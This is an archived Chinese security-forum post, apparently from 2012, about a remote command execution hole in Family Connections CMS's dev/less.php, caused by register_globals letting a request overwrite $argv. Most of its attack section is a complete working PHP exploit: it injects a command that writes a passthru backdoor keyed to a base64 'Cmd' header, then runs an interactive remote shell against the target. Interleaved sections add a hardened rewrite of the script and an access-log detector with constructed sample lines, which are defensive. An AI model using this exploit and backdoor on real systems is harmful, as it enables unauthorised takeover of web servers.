Family Connections CMS v2.5.0-v2.7.1 (less.php) remote command execution exploit - vulnerability warning - 黑吧安全网 (myhack58)

ID: MYHACK58:62201235157
Type: myhack58
Reporter: Anonymous (佚名)
Modified: 2012-10-13


Author: TPCS

From: 90sec


0x01 Introduction

Recently I have been practising with some PoCs, and I picked this old hole to practise on. The first PoC was published on exploit-db; I won't post the link, just search for it. When I first got hold of the original PoC I wanted to search for related material to see whether there was any information about it, and the search results really made me want to curse: the domestic articles about this vulnerability are basically the original pasted up by someone, without a word of description. And the PoC on exploit-db is limited: it runs on Linux and the target it was built against is Linux too. So I came to the conclusion that the people who reposted this PoC didn't even test it before pasting it up to show off.

Well, enough whining, on to the main topic. The vulnerability is in the file /dev/less.php: the variable $theme is taken straight from the parameters ($argv[1]) and interpolated, without any filtering, into a shell command passed to the system() function, so shell metacharacters in $theme become part of the command and are executed. The problematic code is as follows:

    <?php
    // dev/less.php (Family Connections CMS v2.5.0-v2.7.1), relevant part.
    // $theme comes from $argv[1]; with register_globals on, a request
    // parameter argv[1]=... overwrites $argv, so the value is attacker-controlled.
    $theme = isset($argv[1]) ? $argv[1] : 'default';

    system("clear");

    if (file_exists("$dir/themes/$theme/style.css")) {
        echo "\n[ themes/$theme/style.css ] already exists.\n\n";
        echo "Overwrite [ y/n ] ? ";
        $handle = fopen("php://stdin", "r");
        $line = fgets($handle);
        if (trim($line) != 'y') {
            exit;
        }
    }

    // $theme lands unquoted and unfiltered inside the shell command: command injection.
    $worked = system("php -q ~/bin/lessphp/lessc $dir/themes/$theme/dev.less > $dir/themes/$theme/style.css");
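For contrast, a hardened rewrite of the same snippet. This is an added example and not code from Family Connections; it assumes, as the original snippet implies, that the script lives in dev/ under the CMS root (so $dir is derived from __DIR__), and it keeps the original lessc location ~/bin/lessphp/lessc. It refuses to run under a web SAPI at all, reads the theme only from the real command line, allow-lists the theme name, and quotes every argument with escapeshellarg().

```php
<?php
// Added example (not code from Family Connections): hardened $theme handling
// for dev/less.php. Assumptions: the script lives in <cmsroot>/dev/, and lessc
// is still at ~/bin/lessphp/lessc as in the original command.

// 1. This is a maintenance script. Refuse to run under any web SAPI: with
//    register_globals (PHP < 5.4) a request ?argv[1]=... could overwrite $argv,
//    but under the CLI SAPI $argv only ever comes from the real command line.
if (PHP_SAPI !== 'cli') {
    header('HTTP/1.1 403 Forbidden');
    exit("dev/less.php is a command-line tool.\n");
}

$dir = dirname(__DIR__);   // assumption: <cmsroot>/dev/less.php -> <cmsroot>

// 2. Read the theme from the real CLI arguments, never from a global that a
//    request could have populated.
$theme = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : 'default';

// 3. Allow-list the theme name: letters, digits, '-' and '_' only. This rejects
//    every shell metacharacter (; & | ` $ ( ) < > ^ newline) and also '/' and
//    '..', so the value cannot escape the themes/ directory either.
if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $theme)) {
    fwrite(STDERR, "Invalid theme name.\n");
    exit(1);
}

// 4. The theme must already exist as a directory under themes/.
$themeDir = "$dir/themes/$theme";
if (!is_dir($themeDir)) {
    fwrite(STDERR, "No such theme: $theme\n");
    exit(1);
}

$less = "$themeDir/dev.less";
$css  = "$themeDir/style.css";

if (file_exists($css)) {
    echo "\n[ themes/$theme/style.css ] already exists.\n\n";
    echo "Overwrite [ y/n ] ? ";
    $line = fgets(STDIN);
    if (trim($line) !== 'y') {
        exit;
    }
}

// 5. Even after the allow-list, quote every argument with escapeshellarg() so
//    the command is safe whatever the paths contain. '~' does not expand inside
//    quotes, so resolve HOME ourselves. The '>' redirection belongs to our own
//    template, not to the data.
$lessc = escapeshellarg(getenv('HOME') . '/bin/lessphp/lessc');
$cmd   = 'php -q ' . $lessc . ' ' . escapeshellarg($less) . ' > ' . escapeshellarg($css);

$output = array();
$status = 0;
exec($cmd, $output, $status);
if ($status !== 0) {
    fwrite(STDERR, "lessc failed (exit $status)\n");
    exit(1);
}
echo "Wrote themes/$theme/style.css\n";
```

The allow-list is the real control; escapeshellarg() is defence in depth, and the SAPI check removes the whole register_globals route regardless of php.ini. Denying HTTP access to dev/ in the web server configuration is still advisable, since the directory is not meant to be served.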

0x02 Exploitation

Although testing the original PoC myself took some wrestling, capturing and analysing the traffic afterwards gave me a general understanding of the process, and I learned quite a lot along the way. Briefly, the problem I ran into: the command separators on the Linux and Windows command lines differ. Under Windows (cmd.exe), entering "echo hello ; net user" prints "hello ; net user", because ";" is not a command separator there; under Linux, entering "echo hello ; ifconfig" prints hello and then runs ifconfig. The original PoC was written for a Linux server, so the commands it sends are joined with ";". For the Windows server in my test I therefore replaced ";" with "&". (cmd.exe also honours "&&" and "||", and "||" works in both shells, which is why the PoC below uses it.) The concrete implementation is in the PoC at the end.

Exploiting this vulnerability also depends on overwriting a global variable: the request parameter argv[1] has to land in $argv, which only happens when register_globals is on. The directive was deprecated in PHP 5.3 (still present, off by default, and flagged with a startup warning when enabled) and removed outright in PHP 5.4, so from 5.4 on $argv cannot be overwritten from the request and the bug cannot be reached this way. Two caveats for a practitioner: register_globals = Off must actually be set in the php.ini that the web SAPI reads, not only in the CLI's, and the real fix is to keep dev/ out of the web root or deny it in the web server, since a maintenance script that shells out has no business being reachable over HTTP.

0x03 PoC

While writing the PoC I ran into a question about how default_socket_timeout works; after a bit of testing I roughly understood what this setting means. Friends who want the details can look at my blog; I won't go into it here.

The idea behind my PoC differs somewhat from the original author's. The original interacts with the attacker directly through the system() call in the vulnerable file, but then every round trip is very slow. My approach is to interact with the vulnerable file only once, using the system() call to write a PHP backdoor file, and then to have the PoC talk to that file. See the code for the details.

    <?php
    print_r("
    Family Connections CMS v2.5.0-v2.7.1 (less.php) remote command execution exploit by TPCS <>
    ");

    if ($argc < 3) {
        print_r("
    Usage: php ".$argv[0]." <Target ip[:port]> <CMS path> <back door file name>
      Target ip:           the target IP address; if no port is given, the default is 80
      CMS path:            the Family Connections CMS directory
      Back door file name: the backdoor file created after successful exploitation; leave empty for TPCS.php
    Example:
      php ".$argv[0]." 0 /wp/ fuck.php
      php ".$argv[0]." /wp/
    Type exit to end the interaction
    ");
        die;
    }

    error_reporting(0);
    set_time_limit(0);
    ini_set("default_socket_timeout", 8);

    // Stage 1 request: argv[1] in the query string overwrites $argv[1] of
    // dev/less.php (register_globals), so system() runs "|| echo ... > <doorname> ||"
    // and writes a one-line backdoor next to the script. The ^ escapes are for
    // cmd.exe, so this payload is written for a Windows host.
    function CPacket($host, $path, $doorname) {
        $packet  = "GET ".$path."dev/less.php?argv[1]=";
        $packet .= urlencode("||echo ^<?php error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?^> > {$doorname} ||");
        $packet .= " HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "\r\n";
        return $packet;
    }

    // Send a raw HTTP request and return the whole response.
    function SPacket($host, $port, $packet) {
        if (!($socket = fsockopen($host, $port)))
            die("\n[-] No response from {$host}:{$port}\n");
        fputs($socket, $packet);
        return stream_get_contents($socket);
    }

    // Parse host[:port], the CMS path and the optional backdoor name.
    function SArgs($argv) {
        $Args = array();
        if (strpos($argv[1], ":")) {
            $HP   = explode(":", $argv[1]);
            $host = $HP[0];
            $port = (int)$HP[1];
        } else {
            $host = $argv[1];
            $port = 80;
        }
        $Args['host'] = $host;
        $Args['port'] = $port;
        $Args['path'] = $argv[2];
        if (isset($argv[3]) && $argv[3] != "")
            $Args['doorname'] = $argv[3];
        else
            $Args['doorname'] = "TPCS.php";
        return $Args;
    }

    $myArgs   = SArgs($argv);
    $host     = $myArgs['host'];
    $port     = $myArgs['port'];
    $path     = $myArgs['path'];
    $doorname = $myArgs['doorname'];

    $myPacket = CPacket($host, $path, $doorname);
    $mySent   = SPacket($host, $port, $myPacket);

    if (strpos($mySent, "||echo ^<?php")) {
        print_r("exploit success\n");
        // Stage 2: talk to the dropped backdoor. The command travels base64-encoded
        // in a "Cmd" request header, which PHP exposes as $_SERVER['HTTP_CMD'].
        $myPacket  = "GET {$path}dev/{$doorname} HTTP/1.0\r\n";
        $myPacket .= "Host: {$host}\r\n";
        $myPacket .= "Cmd: %s\r\n";
        $myPacket .= "Connection: close\r\n\r\n";
        while (1) {
            print "\nshell# ";
            if (($cmd = trim(fgets(STDIN))) == "exit") break;
            $response = SPacket($host, $port, sprintf($myPacket, base64_encode($cmd)));
            preg_match('/\r\n\r\n(.*)\s/s', $response, $value) ? print $value[1] : die("looks like it didn't work :-(");
        }
    } else
        print_r("exploit failed");
    ?>
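From the defender's side, the PoC leaves two distinctive request shapes in the web server log: an HTTP hit on the CLI-only dev/less.php with argv[] in the query string, followed by requests to a new .php file under dev/. The script below, an added example that is not part of the original post or of the CMS, scans combined-format access-log lines for both. All log lines are constructed for the example (the /wp/ path and the TPCS.php name follow the PoC's usage text); nothing was captured from a real host.

```php
<?php
// Added example (not part of the original post or the CMS): flag the request
// shapes the PoC produces in an Apache/nginx combined access log. The lines in
// $sampleLog are constructed for this example, not captured from a real host.

$sampleLog = <<<'LOG'
10.0.0.5 - - [13/Oct/2012:10:01:02 +0800] "GET /wp/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Oct/2012:10:02:11 +0800] "GET /wp/dev/less.php?argv[1]=%7C%7Cecho+%5E%3C%3Fphp+passthru%28base64_decode%28%24_SERVER%5BHTTP_CMD%5D%29%29%3B+%3F%5E%3E+%3E+TPCS.php+%7C%7C HTTP/1.1" 200 310 "-" "-"
10.0.0.9 - - [13/Oct/2012:10:02:13 +0800] "GET /wp/dev/TPCS.php HTTP/1.0" 200 88 "-" "-"
10.0.0.7 - - [13/Oct/2012:10:03:00 +0800] "GET /wp/themes/default/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
LOG;

/**
 * Return one finding per suspicious line: ['ip' => ..., 'line' => N, 'reason' => ...].
 */
function scanAccessLog($log)
{
    $findings = array();
    foreach (explode("\n", trim($log)) as $n => $line) {
        // Combined log format: ip ident user [time] "METHOD target PROTO" status ...
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        $ip     = $m[1];
        $target = $m[3];
        $path   = (string) parse_url($target, PHP_URL_PATH);
        $query  = (string) parse_url($target, PHP_URL_QUERY);

        // 1. dev/less.php is a CLI maintenance script, so any HTTP hit is
        //    suspect; argv[...] in the query string is the register_globals
        //    overwrite, and shell separators in the decoded value are the injection.
        if (preg_match('~/dev/less\.php$~', $path)) {
            $reason = 'HTTP request to CLI-only dev/less.php';
            if (preg_match('/(^|&)argv(\[|%5B)/i', $query)) {
                $reason .= '; argv[] overwrite in query string';
            }
            if (preg_match('/[;|&`$]/', urldecode($query))) {
                $reason .= '; shell metacharacters in query';
            }
            $findings[] = array('ip' => $ip, 'line' => $n + 1, 'reason' => $reason);
            continue;
        }

        // 2. Any other .php under dev/ is not part of the install. The PoC's
        //    "echo ... > TPCS.php" writes next to less.php, which is why its
        //    second stage fetches dev/<doorname>.
        if (preg_match('~/dev/[^/]+\.php$~', $path)) {
            $findings[] = array('ip' => $ip, 'line' => $n + 1,
                                'reason' => 'request to unexpected script under dev/ (dropped backdoor?)');
        }
    }
    return $findings;
}

foreach (scanAccessLog($sampleLog) as $f) {
    printf("line %d  %-10s %s\n", $f['line'], $f['ip'], $f['reason']);
}
```

Run with php on the command line; on the constructed sample it reports line 2 (less.php with argv[] and metacharacters) and line 3 (TPCS.php under dev/) from 10.0.0.9, and nothing for the ordinary requests. The same two patterns translate directly into a web server deny rule for dev/ and an alert on any 200 response from it.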